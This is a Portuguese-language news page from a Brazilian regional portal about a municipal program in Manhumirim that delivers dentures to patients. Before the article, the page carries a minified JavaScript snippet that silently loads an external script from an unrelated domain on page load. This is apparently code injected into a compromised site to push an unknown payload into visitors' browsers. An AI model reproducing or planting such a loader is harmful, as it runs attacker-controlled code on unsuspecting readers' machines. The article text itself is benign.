;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Programa de Fornecimento de Próteses: Primeiras Unidades São Entregues. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Programa de Fornecimento de Próteses: Primeiras Unidades São Entregues.

A Prefeitura de Manhumirim, através da Secretaria Municipal de Saúde, já está entregando as primeiras próteses (dentaduras) do programa lançado pelo governo municipal em agosto. O programa prevê a entrega de 60 próteses mensalmente beneficiando vários pacientes das Unidades de Saúde do município. Receberam as próteses recentemente pacientes das Unidades dos bairros: Roque, Lourdes, Isidoro e da Policlínica municipal. O prefeito municipal, Ronaldo Lopes tem participado das entregas, assim como o Secretário de Saúde, Geraldo Cesar, a Coordenadora Odontológica, Marta Aparecida Heringer, e Profissionais da odontologia das Unidades de Saúde.  Ronaldo Lopes está dando total apoio ao programa para que possa atender a grande demanda do município. “Devolver o sorriso a estas pessoas é algo que não tem preço!” destaca o prefeito.

Qualidade

Vale destacar que as próteses são confeccionadas por materiais da mais alta qualidade e tudo é feito com acompanhamento de profissionais da área.

Satisfação

O momento de recebimento das próteses é de pura emoção por parte dos pacientes que voltam a sorrir de forma mais descontraída e feliz.

Valdir Vieira – Assessoria de Comunicação – Prefeitura de Manhumirim.

Ofertas


Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.